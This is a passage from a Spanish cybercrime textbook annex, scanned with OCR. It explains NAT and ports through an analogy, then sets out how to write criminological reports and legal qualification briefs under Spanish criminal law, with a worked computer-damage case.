Lo envía a Internet
Simultáneamente Juan quiere hablar con Araceli, su mensaj era es Ma-
ríall l (está en la misma red que Azucena).
Ramón333:
Apunta en su agenda (tabla de encaminamiento) la pareja Juan-Ma-
ríal 11
Sustituye Juan por Ramón333
Lo envía a Internet

ii. ¿Hay algún problema?

Manolo responde con su mensajera Sara847 a Ramón333, que es el


nombre que conoce. Ramón333 mira su agenda y se lo envía a Pedro.
Azucena responde con su mensajera Maríalll a Ramón333, que es el
nombre que conoce ... Ramón333 mira su agenda y ¡Hay dos nombres aso-

- 316 -
l. PRÁCTICAS DE SEGURIDAD INFORMÁTICA

ciados a Maríal 11! ¿El mensaje de respuesta es de Azucena que responde a


Pedro o de Araceli que responde a Juan? ¡No lo sabe!
¿Y si Luis, que no está en la red de Juan, quiere hablar con Juan? Solo pue-
de hablar con Ramón333 y Ramón333 no tiene apuntado nada sobre Luis ...
Ramón333 no puede trabajar así, le faltan datos en su agenda.
La solución la tiene Nati (NAT-Network Address Translation-)
Nati apunta en la tabla NAT además de los interlocutores, los puertos y
el protocolo.
¿Qué son los puertos? Para que a Pedro se le oiga tiene que abrir una
puerta de su casa y hablar. Pero hay miles de puertas en su casa. Si un ladrón
quisiera robar a Pedro, primero tendría que llegar a su casa y luego tendría
que ir puerta por puerta a comprobar si está abierta. Pedro podría ver que
hay un merodeador.
Las puertas son interesantes. Para hablar sobre fútbol hay una puerta,
sobre cine otra, etc., y hay unas 2000 libres, sin asignar.
Nati es pilla y para evitar que alguien se nos cuele asigna al azar una de
esas puertas libres cada vez que alguien quiere hablar.
Veamos de nuevo la comunicación
Pedro quiere hablar con Azucena, que espera mensajes desde su puerta
80. Nati apunta Pedro-Maríal 11 (ya que Pedro quiere mandar un mensaje al
mensajero Mariall l, que es el mensajeo de Azucena). Y abre una puerta al
azar hacía la puerta 80 de Azucena, por ejemplo 49999, y envía el mensaje
hacia allí con el remitente Ramón333/49999.
Juan quiere hablar con Araceli, que espera mensajes desde su puerta 33.
Nati apunta Juan-Maríalll (Juan va a mandar un mensaje al mensajero Ma-
ria 111, que es el mensajero de Araceli) y abre una puerta asignada al azar
para poder mandar el mensaje a Maria 111, por ejemplo 57555. Así, el remi-
tente de ese mensaje aparece como Ramón333/57555 y se manda el mensaje
a Internet.
Con esto ya está resuelto el problema de discriminar respuestas porque
la asignación de puertas es única. Veamos que ocurre cuando nos contestan a
los mensajes mandados con anterioridad:
• Llega un mensaje de Marialll/80 que va dirigido al mensajero Ra-
mon333 en la puerta 49999. Nati tiene apuntado que a Pedro se le co-

- 317 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

nace en la calle por Ramón333 puerta 49999 (Ramón333/49999) y


está esperando un mensaje de Marialll/80. Así que se entrega a Pe-
dro.
• Llega un mensaje de Marialll/80 que va dirigido al mensajero Ra-
mon333 enla puerta 57555. Nati tiene apuntado que a Juan se le cono-
ce en la calle por Ramón333 puerta 57555 (Ramón333/57555) y está
esperando un mensaje de Marial 11/80. Así que se entrega a Juan.

3. Cuestionario:

l. ¿Tengo un router en casa?


2. ¿Qué tiene apuntado?
3. ¿Quién tiene acceso a Nati? ¿Quién tiene derecho a tener acceso?
4. ¿Se actualiza con frecuencia?
5. ¿Tiene administración remota?

- 3 18 -
2
Casos prácticos de cibercrimenes
l. INTRODUCCIÓN. ELEMENTOS DE ANÁLISIS DEL CASO PRÁCTICO

Un supuesto práctico de cibercriminalidad puede analizarse desde di-


versas perspectivas:
■ Dimensión jurídico-penal: valorando un caso práctico mediante un
escrito de calificaciones o confeccionando un informe jurídico.
■ Dimensión criminológica: realizando un informe pre-sentencia so-
bre un determinado supuesto en el que esté implicado un cibercrimi-
nal o emitiendo un informe criminológico para su valoración en un
proceso penal. Dentro de esta categoría también se puede incluir, con
cierta autonomía propia, el informe victimológico, pues, aunque es
frecuente que los informes criminológicos ya contengan un apartado
dedicado a la víctima, la especialización existente hoy en día en Vic-
timología, así como el apoyo legislativo que las víctimas tienen (Ley
4/2015, de 27 de abril, del Estatuto de la víctima del delito), pueden
requerir documentos exclusivamente dedicados a ella.
■ Dimensión criminalística: a través de informes periciales confeccio-
nados por expertos en informática forense sobre la prueba tecnoló-
gica para ilustrar a la autoridad judicial.
Como para la realización de informes periciales se requieren unos co-
nocimientos técnicos en electrónica e informática y su puesta en práctica en
laboratorios, nos centraremos en la dimensión jurídico penal y criminológica.
Además, es frecuente que en los informes criminológicos y en los escritos de
calificaciones se tengan en cuenta las cuestiones relativas a la prueba elec-
trónica, el modus operandi del cibercriminal, etc., por lo que esta esfera de

- 321 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

especial importancia en la investigación de los ciberdelitos tampoco quedará


huérfana de contenido práctico.

l. El informe criminológico en Criminología aplicada

Un informe criminológico es un documento de carácter técnico que, si-


guiendo una estructura formal adecuada para su interpretación y comprensión
por personas no especializadas en Criminología, debe exponer por escrito las
circunstancias observadas en el examen de la cuestión que se considera (el fe-
nómeno criminal), con explicaciones detalladas que certifiquen lo expresado.
Es una exposición de hechos con respecto a un tema o un problema relativo al
delincuente, la víctima, las circunstancias del delito, etc. Es un documento que
describe el estado de un problema criminológico desde una perspectiva cientí-
fica, esto es, siguiendo una metodología y sistemática concreta: la de la ciencia
de la Criminología. La Criminología orientada a la aplicación en la práctica fo -
rense sirve como un cauce de suministro al operador judicial de conocimien-
tos científicos sobre el crimen, el delincuente, la víctima y el sistema de control
social. De este modo, el informe criminológico es una herramienta destinada a
proporcionar al operador judicial conocimientos empíricos sobre aspectos cri-
minológicos no normativos que, normalmente, desconoce (SUBIJANA ZUNZUNEGUI,
1997; CLIMENT DuRAN, GARRJDO GENOVÉS, & GUARDIOLA GARcíA, 2012; RODRIGO TORRES,
2009; GARRIDO GENOVÉS & BELLOCH Al.BIÑANA, 2017) .
Por consiguiente, el perito criminólogo o criminólogo forense es un pro-
fesional que suministra al juez conocimientos científicos sobre cuestiones
extranormativas y que son precisas para valorar algún hecho o circunstancia
relevante para delimitar: la responsabilidad penal del imputado conforme a
su perfil, el tipo de consecuencia jurídica más adecuada dadas las circunstan-
cias personales, sociales, psicológicas y criminológicas del autor, el modo de
ejecución del crimen, así como la participación de la víctima en su realización
o la satisfacción más adecuada por el daño sufrido.
El perito criminólogo, en tanto que experto titulado oficial, debe guar-
dar el debido secreto profesional tanto cuando sea llamado por designación
judicial, como si participa a instancia de una de las partes en el ámbito del
proceso. El criminólogo debe comunicar al particular (victimario o víctima)
su condición de tal, así como el papel que desempeña en el proceso, razón por
la cual todo desvelamiento que se realice en este ámbito de información pri-
vada supondrá un legítimo ejercicio dispositivo por parte de su titular.
Así, el informe criminológico es el instrumento básico para que los cri-
minólogos desarrollen adecuadamente su rol profesional.

- 322 -
2. CASOS PRÁCTICOS DE CIBE RCIÚMENES

Cuando hablamos de informe criminológico podemos estar refiriéndo-


nos a varios tipos de documentos que pueden encuadrarse en dos grandes
categorías:
• De naturaleza general y objetiva: de importancia sociológica, trata de
estudiar la forma en que una o varias tipologías criminales se mani-
fiestan en toda la sociedad o en un área geográfica más pequeña. En
esta clase de informes no se estudia un supuesto concreto, sino un
conjunto de crímenes que suceden en una zona geográfica delimitada
y durante un marco temporal concreto. Normalmente tienen una fina -
lidad preventiva, con vistas a reducir las tasas de criminalidad, pero
también pueden servir para la adecuada confección de lineamientos
de política criminal e, incluso, con fines puramente académicos.
Ej. A2.l: Un informe de política criminal a nivel nacional o autonómico,
un informe completo sobre la delincuencia en un municipio, ciudad, etc., o un
informe sobre prevención situacional, encajan con esta clase de naturaleza. Se
basan en el estudio de factores de riesgo, modus operandi de tipologías delicti-
vas, confección de perfiles criminales y victimales genéricos, estudios de con-
centración de delitos o "puntos negros", etc.

• De naturaleza particular (informe forense criminológico) : consisten


en el análisis de un delito específico, su autor y su víctima o víctimas,
sobre los cuales se proyectan los conocimientos y los criterios crimi-
nológicos.
Ej. A2 .2: Esta clase de informes se basan en cuestiones tales como el modo
comisión de crimen, causas o motivaciones que llevaron a su ejecución, las ca-
racterísticas personales, familiares y ambientales del delincuente o la víctima.
Además de ello, el criminólogo tendrá en cuenta cualesquiera otros informes
que se hayan confeccionado sobre el caso concreto (psicólogos, trabajadores
sociales, policía, etc.), de modo que deberá realizar una valoración completa del
suceso y los actores que han intervenido en él. Todo este trabajo puede contri-
buir a mejorar el perfil del enjuiciamiento del delito y el delincuente y la deter-
minación de la reacción social o consecuencia jurídica correspondiente, ya sea
una pena o una medida de seguridad. En España, esta clase de informes pueden
realizarse de oficio por parte de un criminólogo que forme parte del Equipo
Técnico adscrito a un Juzgado de Menores.

Frecuentemente, para referirse al informe criminológico encontrare-


mos el uso tanto del término "informe" como del concepto "opinión experta"
o "dictamen". Sin embargo, ambas declaraciones no son exactamente coinci-
dentes: mientras que el "informe" alude a la descripción de las características

- 323 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

y circunstancias de un evento o de las personas que lo protagonizan (valo-


ración objetiva), la "opinión experta" o "dictamen", por otro lado, se reserva
para el veredicto o juicio emitido con base en el informe. Normalmente, los
criminólogos realizan un informe criminológico en el que exponen sus con-
clusiones objetivas, pero es la autoridad judicial la que realiza el dictamen
sobre la cuestión, pudiendo tener en cuenta o no el documento. En otras oca-
siones, al criminólogo se le solicitará un dictamen sobre una cuestión concre-
ta, lo que supone la emisión de un diagnóstico o juicio sobre una de las áreas
de su competencia.
Podemos resumir las funciones del criminólogo forense en los siguien-
tes puntos esenciales:
• Elaboración de un perfil criminal o victirnológico.
• Análisis de la escena del crimen o motivacional (estado de ánimo
subjetivo específico).
• Exposición de teorías criminológicas aplicadas a un caso específico.
• Información sobre las declaraciones y sus prejuicios.
• Recomendación sobre el tipo de sanción o medida a imponer.
• Mejor perfil de la compensación o satisfacción por el daño causado
por el delito.
Asimismo, el criminólogo forense podrá actuar tanto dentro como fuera
del proceso penal formal:
• Dentro del proceso penal: durante la fase de investigación del caso y
siguiendo las instrucciones del Juez de Instrucción (de oficio o a peti-
ción del acusado o la víctima).
• Fuera del proceso penal: el acusado o la víctima le pide al criminó-
logo que informe sobre un determinado aspecto de la persona del
acusado o de la víctima, o del acto criminal.
Llegados a este punto, debemos especificar que para nuestros fines aca-
démicos interesa la confección de informes criminológicos de naturaleza par-
ticular.
Además de estas dos categorías generales, también existen otros infor-
mes relacionados pero no necesariamente confeccionados por un criminólo-
go titulado, ni utilizando la metodología de la Criminología aplicada, corno los
informes de detectives privados, los informes de los Equipos Técnicos y Jun-
tas de Tratamiento de los centros penitenciarios o los informes de los Cuer-
pos y Fuerzas de Seguridad del Estado.

- 324 -
2. CASOS PRÁCTICOS DE CIBERCIÚMENES

En nuestro país no existen unas pautas reguladas de manera explícita


para la confección de informes criminológicos. No obstante, existen y han
existido algunos antecedentes normativos que pueden guiar al criminólogo
en cuestiones relativas a la estructura y contenidos de un informe criminoló-
gico.
Ej. A2.3: El primero de ellos, actualmente derogado, se encuentra en el art.
28 del Real Decreto 515/2005, ele 6 de mayo, que establece las circunstancias
ele ejecución de sanciones laborales en beneficio de la comunidad y ubicación
permanente, ciertas medidas de seguridad, así como la suspensión de la eje-
cución de penas privativas de libertad. En concreto, se indicaba que "antes del
juicio oral, el juez o tribunal podrá solicitar a los servicios sociales penitencia-
rios, como prueba documental o pericial, un informe social sobre la situación
del imputado".
Otro de los campos en los que se puede solicitar un informe criminoló-
gico es en el de la delincuencia juvenil a través del informe del equipo técnico
en la legislación penal juvenil (art. 27 LORRPM). El informe del equipo técnico
es mucho más que una mera diligencia, puesto que será imprescindible para
garantizar el interés superior del menor y la individualización de las medidas
aplicables, sean estas cautelares o definitivas. Además de ello, dotará de un ma-
yor contenido educativo y socializador al proceso penal de menores a l analizar
las circunstancias personales del meno 1:
Por último, también puede requerirse un informe criminológico en el área
penitenciaria (CUARESMAMOHALES, 2010).

Aunque en España aún no se ha incorporado en la Administración de


Justicia al criminólogo de forma plena, en varios países europeos -Reino Uni-
do, Bélgica, Holanda, Dinamarca-, además de Estados Unidos y Canadá, existe
la posibilidad de solicitar un "informe social" (sobre su incorporación en Ca-
taluña, véase LARRAURI & ZoRRILLA, 2014) o criminológico en el proceso penal,
mejor conocido como Informe Previo a la Sentencia o Informe pre-sentencia
(PSR, por sus siglas en inglés), cuya función es proporcionar información al
juez sobre (LARRAURI PIJOAN, 2012):
• la situación personal y social de la persona acusada;
• su actitud hacia el crimen y;
• el tipo de sanción o medida que puede ser más resocializadora.
Actualmente, sin embargo, el mejor referente legal sobre la forma y el
contenido de un informe criminológico sigue siendo la regulación del informe
pericial dentro del proceso penal, regulado en la LECrim. El informe pericial
está regulado en su Título V, Capítulo VII, intitulado "Del Informe Pericial".

- 325 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

Las funciones del informe experto se definen en el art. 456 LECrim: el


informe del experto se acordará cuando, para conocer o apreciar cualquier
evento o circunstancia importante en el resumen, el conocimiento científico o
artístico sea necesario o conveniente.
La estructura de un informe pericial queda explicitada en el art. 458 LE-
Crim, que tomaremos en consideración a la hora de examinar un supuesto:
• Descripción de la persona o cosa que es objeto de la misma, en el es-
tado o la forma en que se encuentra;
• Lista detallada de todas las operaciones realizadas por los expertos
y sus resultados, ampliadas y autorizadas de la misma manera que la
anterior;
• Las conclusiones que a la vista de tales datos formulan a los expertos,
de acuerdo con los principios y reglas de su ciencia o arte.
Este escueto esquema puede servir de base para confeccionar un infor-
me criminológico, pero es preciso dotarle de un contenido concreto. Para ello,
siguiendo las pautas dictadas por nuestro Derecho procesal, diferenciaremos
en un informe criminológico tres partes:
• Reconocimiento del problema.
• Metodología y Análisis.
• Conclusiones.
Estas tres partes forman una estructura en forma de silogismo lógico,
método utilizado por el criminólogo: la premisa principal es el conjunto de
conocimientos técnicos del experto, la premisa menor es el conjunto de even-
tos o eventos en los que se realiza la experiencia, y la conclusión lógica es la
opinión técnica final.
Así, la estructura y contenidos de un informe criminológico aplicable
a un supuesto de cibercriminalidad será la siguiente (CLIMENT DuRAN, GARRIDO
GENOVÉS, & GUARDIOLA GARCÍA, 2012; GERMANMANCEBO, 2013; GARRIDO GENOVÉS & BE-
LLOCH ALBIÑANA, 2017):
• Encabezado: número de expediente (número o clave de identifica-
ción de la causa) y Juzgado para el que se emite y a quien va dirigido.
• Persona o entidad que solicita el informe: nombre del perito, rango
académico y su cargo correspondiente relacionado con la especialidad.
• Propósito del informe criminológico, especificando lo que conste en
la providencia del Juez o lo solicitado directamente por el cliente. El
informe pericial debe estar orientado a contestar a las preguntas o

- 326 -
2. CASOS PRÁCTICOS DE CIBERCRÍMENES

temas planteados en la cuestión solicitada sobre alguno de los aspec-


tos del fenómeno criminal.
• Definición operativa: la pregunta de investigación.
Ej. A2.4.: Por ejemplo, establecer hipótesis sobre los factores explicativos
de la conducta de un cibercriminal. Para ello, será necesario atender a los posi-
bles trastornos de personalidad, entorno cultural, familiar y sociodemográfico,
características del delito, nivel de planificación, y la relación víctima - victimario
(PrnETO MONTES, 2012). También será útil conocer las explicaciones que las dife-
rentes teorías sobre la cibercriminalidad han dado a la génesis del comporta-
miento criminal en el ámbito digital y tecnológico.

• Referencia a la evidencia científica relevante para el propósito del


informe pericial y método: bases teóricas de las que se parte (por
ejemplo, las teorías criminológicas específicas sobre el fenómeno del
cibercrimen, perfilado del cibercriminal, perfilado de la víctima de
los delitos informáticos, etc.) y el análisis de la información conteni-
da en los documentos de las diligencias judiciales, demás pruebas e
informes aportados en la causa.
Ej. A2.5.: Entre otros, puede tratarse de la hoja histórico-penal del acusado
(antecedentes penales) , otros informes periciales obrantes en la causa (informe
psicológico, médico-forense, etc.) tanto del acusado como de la afirmada vícti -
ma, datos históricos familiares, socia les y personales, etc.

En este proceso será necesario explicar detalladamente los siguientes


puntos:
a) Estrategia de investigación del objeto del informe: por ejemplo, la en-
trevista personal, el análisis de los hechos que figuran en la instruc-
ción, el perfilado criminal o victimal. En definitiva, deberá reflejarse
la sistemática de cada uno de los pasos que se vayan realizando.
b) Instrumentos o material utilizado.
c) Contexto temporal.
d) Procedimiento seguido.
• Resultados (repita esta sección en caso de que existan varias pre-
guntas u objetos de investigación, incluyendo los diferentes resul-
tados obtenidos para cada hipótesis o área): los hallazgos del estu-
dio y las pruebas relevantes al caso que han llevado a los mismos.
Se procurará hacer constar aquellos datos que luego servirán de
base al discurso de conclusiones. También será preciso desglosar
los resultados de cada estrategia de investigación / instrumentos
utilizados si han sido varias las metodologías empleadas.

- 327 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

• Conclusiones sobre la pregunta formulada. Se trata de contestar a


la demanda judicial, ciñéndose a lo que se requiere en la petición
del informe.
• Evaluación final de acuerdo con los resultados esperados; limita-
ciones del estudio y precauciones a tener en cuenta.
• Referencias bibliográficas y otras fuentes.
• Se recomienda incluir una cláusula de salvaguarda. A modo de
ejemplo, podría ser la que sigue: "Las presentes conclusiones se re-
fieren a los objetivos demandados y a la aplicación de la metodolo-
gía antes mencionada. Un cambio de las circunstancias o nuevos da-
tos exigirían un nuevo análisis y podrían modificar los resultados".

2. El escrito de calificaciones

Para realizar un escrito de calificaciones, tomaremos como guía lo indi-


cado en el art. 650 LECrim.
El escrito de calificación se limitará a determinar en conclusiones preci-
sas y numeradas (SANz DELGADO, 2012; VAZQUEZ GoNZALEZ, 2018):
• Los hechos punibles que resulten del sumario.
• La calificación legal de los mismos hechos, determinando el delito
que constituyan.
• La participación que en ellos hubieren tenido el procesado o proce-
sados, si fueren varios.
• Los hechos que resulten del sumario y que constituyan circunstan-
cias atenuantes o agravantes del delito o eximentes de responsabili-
dad criminal.
• Las penas en que hayan incurrido el procesado o procesados, si fue-
ren varios, por razón de su respectiva participación en el delito.
El acusador privado en su caso, y el Ministerio Fiscal cuando sostenga la
acción civil, expresarán además:
• La cantidad en que aprecien los daños y perjuicios causados por el
delito, o la cosa que haya de ser restituida (responsabilidad civil de-
rivada de delito).
• La persona o personas que aparezcan responsables de los daños y
perjuicios o de la restitución de la cosa, y el hecho en virtud del cual
hubieren contraído esta responsabilidad.

- 328 -
2. CASOS PRÁCTICOS DE CIBERCRÍMENES

Los puntos anteriormente indicados conforman la estructura básica de


resolución de cada caso práctico y el modelo a seguir, que pasaremos a desglo-
sar a continuación, separando cada apartado. Debe notarse, no obstante, que
tal esquema legal es común a todas las partes del proceso por lo que en algu-
nos supuestos se podría optar por posicionarse en el rol de la acusación par-
ticular o la defensa. Se pretende que el lector realice una calificación objetiva,
plasmando los datos y conclusiones jurídicas que perciba del supuesto desde
la ideal posición del Fiscal, desvinculada, por ello, de un interés por acusar o
por defender, si bien, para determinados supuestos de hecho, podrá pedirse al
estudiante que adopte una postura a favor de la acusación o la defensa.

2.1. Los hechos probados ofactum:


La primera cuestión objeto de análisis respecto delfactum que se pre-
senta, es la que resuelve la posible calificación jurídica. En elfactum, se con-
tiene tan solo el resultado final de la actividad probatoria realizada durante
la fase de instrucción y se presenta de ordinario mediante términos descrip-
tivos, de lenguaje simple o común (no técnico-jurídico), en referencia a la ac-
ción, y a cómo tuvo lugar el delito, por lo que han de excluirse valoraciones
jurídico-penales, predeterminantes del fallo y calificaciones jurídicas. Cada
una de las partes interesadas (defensa y acusación) optarán, a salvo de que
llegaran a algún tipo de conformidad, inevitablemente por una calificación
opuesta. La defensa y la acusación, por tanto, pueden llegar a una calificación
jurídica de los hechos diferente. Lo relevante, en definitiva, será que los argu-
mentos que esgrima cada parte estén ajustados a una argumentación jurídica
técnicamente plausible. Aunque es posible que el estudiante se decante por
una u otra posición (o incluya inserciones de cada una de ellas), a la hora de
resolver los hechos procuraremos mantener una posición neutral y objetiva
más aproximada a la de la acusación pública del Ministerio Fiscal. En cual-
quier caso los hechos delfactum resultan de la investigación de la Instrucción
previa, por lo que no podrán ser sustancialmente alterados y deben ser toma-
dos como verdaderos y probados. Dicho de otro modo, a la hora de realizar un
escrito de calificaciones objetivo, no resultarán de utilidad las hipótesis o po-
sibilidades de interpretación alternativas a los hechos incluidos en la causa.
Esta clase de interpretaciones, que van más allá de lo estrictamente expuesto
en elfactum, pueden ser de utilidad a la hora de defender una determinada
posición, pero se trata, precisamente, de opciones que sirven a unos intereses
partidistas -en el caso de los abogados, de sus clientes- alejadas de la impar-
cialidad que se exige en una calificación objetiva de los hechos. El estudiante
no habrá de presuponer lo que no se dice expresamente en la causa y deberá
operar solamente con los datos que se proporcionen.

- 329 -
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

En este apartado será necesario seleccionar los puntos clave delfactum,


resumiéndolos para indicar algún aspecto de su interés, los hechos que se
le ofrecen entre estos materiales. Los puntos clave del análisis serán todos
aquellos hechos de los que se pueda destilar la posible responsabilidad cri-
minal, y civil derivada de la misma, de los sujetos intervinientes a título de
autor o partícipe en los hechos.
Ej. A2.7: Se declara probado que Emilia, trabajadora de la empresa Ma-
prip, S.A.U., efectuó el borrado de elementos dentro del ordenador que tenía
asignado, donde se encontraba el listado de clientes, muchos de los cuales solo
conocía ella. Consta probado que Emilia llevó a cabo esta acción como represa-
lia por el impago de su sueldo de los últimos dos meses. El perjuicio total cau-
sado a la empresa por el borrado de los archivos asciende a más de 10.000 €. El
procedimiento se ha demorado más Lle 1 aüo por causas ajenas a la voluntad ele
la acusada.

2.2. Calificación jurídica de los hechos:


Es en este segundo apartado de redacción y desarrollo, tras la lectura y
análisis delfactum, donde debe integrarse el delito o delitos en cuestión, de-
terminados tras la observación del supuesto planteado. La fórmula que, por
escrito, se haya de utilizar en la resolución, habrá de ser la más usual en la
práctica, que resuelve como sigue: "Los hechos probados son constitutivos de
un delito de ... , tipificado en el artículo ... del Código penal". En síntesis, cada
calificación jurídica habrá de ir acompañada del elemento numérico del CP,
donde se halle la misma.
Deberá observarse el análisis de los elementos (objetivos y subjetivos)
del delito que se trate, y habrá de apreciarse en su resolución si se cumple
cada uno de ellos para poder subsumir la conducta de los hechos probados
en alguna de las tipologías de cibercrimen explicadas a lo largo de este libro.
En ocasiones, será preciso valorar los posibles concursos de leyes que
puedan tener lugar en el caso, acudiendo para tal procedimiento selectivo a
los principios recogidos en el art. 8 CP: especialidad, subsidiariedad, consun-
ción, alternatividad.

2.3. Iter criminis:


Con relación al grado de ejecución tendrá que indicarse si se trata de un
delito consumado, tentado (en su modalidad acabada o inacabada), o si nos
hallamos ante un supuesto de acto preparatorio punible (conspiración, pro-
posición y provocación).

- 330 -
2. CASOS PRÁCTICO on c1111mc1t fM HNE

Ej. A2.8: Sobre la base de los h •chos p oh d se estima la posible concu-


rrencia de un delito de daflos inforntótko el I rtfculo 264.1 del Código Penal.
A continuación, se analizarán los ele cnt • objetivos y subjetivos del delito de
daños informáticos para corroborar u xi t ncla.

2.4. Autoría y participación:


En este apartado habrán de resolverse los problemas relacionados con la
autoría y participación en la acción delictiva que se ofrece en los hechos pro-
bados, y así se deslindan quehaceres y responsabilidades del caso en cues-
tión: autores, inductores, cooperadores necesarios, cómplices. (arts. 28 y 29
CP). La responsabilidad de cada uno de los sujetos intervinientes se examina-
rá por separado. Para reflejarlo en un escrito de calificaciones, habitualmente
se utiliza la siguiente fórmula: "De los mencionados delitos es responsable en
concepto de (autor o modalidad de participación) conforme a lo dispuesto en
el (art. 28 o 29) del Código Penal, el acusado ...".
Ej. A2.9: Del mencionado delito es responsable en concepto de autora di-
recta conforme a lo dispuesto en el art. 28 del Código Penal, la acusada Emilia.

2.5. Circunstancias modificativas de la responsabilidad criminal.


En este apartado del esquema de resolución habrán de integrarse las cir-
cunstancias accidentales genéricas concurrentes que modifican la responsa-
bilidad criminal, ya se trate de eximentes completas e incompletas (arts. 20 y
21.1 CP), atenuantes y/o agravantes (arts. 21.2-21.7 y art. 22 CP respectiva-
mente), acompañadas de su numeración especifica en el CP.
Ej. A2.10: Concurre en este supuesto la atenuante ordinaria de dilaciones
indebidas del art. 21.6 CP.

2.6. Determinación de la pena


En este punto se procede a la individualización de la responsabilidad cri-
minal teniendo en cuenta la autoría o participación y tras la consideración de
la concurrencia o no de circunstancias modificativas.
La horquilla penal del delito en cuestión, tal y como aparece en el Código
penal, consta de un límite mínimo y un límite máximo. Este intervalo penoló-
gico supone el marco inicial a tener en cuenta para determinar la pena.
Teniendo en cuenta este marco de sanción, habrá de valorarse el iter cri-
minis, con la consiguiente aplicación de la pena si nos hallamos ante la consu-

- 331 -
Ci bercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

mación (art. 61 CP.). De tratarse de un supuesto en grado de tentativa, es de


aplicación el artículo 62 CP, que rebajará en uno o dos grados (pena inferior
en uno o dos grados) el marco punitivo previsto en el delito (para lo cual ha-
brá de seguirse el procedimiento previsto en el art. 70.1.2 CP.). Siguiendo una
tradición jurisprudencia! y doctrinal, pero siempre atendiendo al peligro in-
herente al intento y el grado de ejecución alcanzado, la tentativa acabada su-
pone la bajada de un grado, mientras que, por su menor incidencia en el bien
jurídico protegido, la tentativa inacabada conlleva la bajada en dos grados.
De seguido, procede individualizar entre los partícipes, por lo que la
pena se prevé en toda su extensión para el autor y los asimilados al autor (art.
28 CP), mientras que en los supuestos de complicidad (arts. 29 y 63 CP) la
pena habrá de ser disminuida, en su caso, en un grado.
El siguiente paso, establecido ya el nuevo marco de pena (con su límite
máximo y mínimo) para los intervinientes en los hechos, habrá de ser la indi-
vidualización que proceda al tener en cuenta la concurrencia o no de circuns-
tancias modificativas de la responsabilidad criminal. Para ello será preciso
utilizar las reglas de los arts. 65 y 66 CP o la específica prevista para el caso de
concurrir una eximente incompleta, que se encuentra en artículo 68 CP.
Como pauta general, la concurrencia de atenuantes permitirá imponer el
castigo en la mitad inferior de la horquilla penal del delito que corresponda (es
decir, desde el límite mínimo hasta la mitad de la pena prevista para el delito) pu-
diendo, incluso, rebajar en grado la pena si son circunstancias muy cualificadas
(de especial atenuación); por otra parte, la concurrencia de agravantes permiti-
rá imponer la pena en su mitad superior (esto es, desde la mitad de la horquilla
penal hasta el límite máximo de pena permitida por el delito) llegando, en los
supuestos de concurrencia de varias agravantes, a poder subir en grado la pena.
En el supuesto de que, en un mismo caso, se den al mismo tiempo agravantes y
atenuantes se deberán ponderar ambos para ver cuál tiene mayor intensidad.
En el supuesto de que no se den ni atenuantes ni agravantes, la autori-
dad judicial siempre podrá individualizar la pena teniendo en cuenta los dos
criterios recogidos en el art. 66.1.6 CP: las circunstancias personales del de-
lincuente y la gravedad de los hechos.
Para los supuestos de delitos imprudentes y para los delitos leves (arts.
13.3 y 33 CP), las reglas citadas del artículo 66.1 CP no serán aplicables sino
la específica del art. 66.2 CP, que permite al juzgador aplicar la pena a su pru-
dente arbitrio, sin sujetarse a las reglas previstas en el apartado anterior.
Las reglas generales para resolver la bajada de un grado, o para hallar la
pena superior en grado, se encuentran, como se ha dicho, en el artículo 70 CP.

- 332 -
2. CASOS PRÁCTICOS DE 1B RCHfM BNI ..

La pena aplicable, tras la individualiz Ión lt d , h br d •r t •ultlH •JI


cuenta a los efectos de concurrir en el supu sto n u tión más d lit n
la consecuencia de la aparición de concursos de delitos) que habrán d r sol-
verse, entonces, mediante las reglas previstas en los artículos 73 y siguientes
del Código penal.
Quien, a través de una única acción, realiza varios delitos produce un
concurso ideal. El que, a través de una pluralidad de acciones, comete una
pluralidad de delitos realiza un concurso real de delitos. Por otra parte, quien
comete un hecho delictivo necesario (delito medio), en relación de utilidad,
para cometer otro ( delito fin) realiza un concurso medial de delitos.
En el concurso real, la pena final será la resultante de la suma de las pe-
nas de cada uno de los delitos individualizadas por separado (acumulación
material o puramente matemática de penas), teniendo como límite de cum-
plimiento lo indicado en el art. 76 CP (acumulación jurídica).
El concurso ideal de delitos se resuelve conformando una nueva horquilla
penal que tome como referencia el delito más grave, esto es, el castigado con un
limite máximo de pena más alto conforme a lo indicado en el Código penal (sin
aplicar atenuantes o agravante), en su mitad superior. Sobre la base de esta nue-
va horquilla penal operaremos para individualizar la pena. La pena resultante se
comparará con el resultado de sumar las penas que correspondería aplicar si se
penaran separadamente las infracciones. Y se elegirá la menos grave.
El concurso medial de delitos implica la confección de una pena híbrida en-
tre los dos delitos implicados, realizando la siguiente operación: el nuevo límite
mínimo de la horquilla penal de la pena híbrida corresponde a la pena prevista
para el delito más grave y el nuevo límite máximo será la suma de las penas con-
cretas que se hubieran impuesto a los delitos de haberse castigado por separado,
límite que no podrá ser sobrepasado. Una vez establecido el mínimo y el máximo,
este marco cuantitativo constituirá una nueva pena, a la que habrán de aplicarse
los criterios del art. 66.1.6 CP, como mecanismo final de individualización.
Finalmente, existen supuestos en los que, a través de una pluralidad de
acciones, se comete, a efectos jurídicos, un único delito considerado más gra-
ve, bien por su continuidad en el tiempo (delito continuado), o por la afec-
tación a una pluralidad de victimas (delito masa). El delito continuado y el
delito masa y sus requisitos están regulados en el art. 74 CP.
Tras las operaciones indicadas, solamente quedará resolver el supuesto
indicando de manera sintética el Fallo al que ha llegado el juzgador (en este
caso, el estudiante), con la siguiente fórmula:

- 333
Cibercriminalidad.
Cuarta parte. ANEXO. CASOS PRÁCTICOS

"Debemos condenar y condenamos (o, alternativamente, debemos


absolver y absolvemos) al acusado X por el delito X, recogido en el art. X
CP, a la pena de X".
Ej. A2.ll : Que debo condenar y condeno a Ernilia como autora ele un delito
de daños informáticos del artículo 264.1 del Código Penal, con la concurrencia
de la circunstancia atenuante de la responsabilidad criminal de dilaciones inde-
bidas (por lo que la horquilla penal, conforme al art. 66 CP deberá ser tomada
en su mitad inferior, es decir, d e 6 meses a 1 afio y 9 meses de prisión), impo-
niéndole la pena ele 18 meses de prisión e inhabilitación especial para el ejerci -
cio del derecho de sufragio pasivo durante el tiempo de la condena y al pago de
las costas procesales (art. 123 CP) .
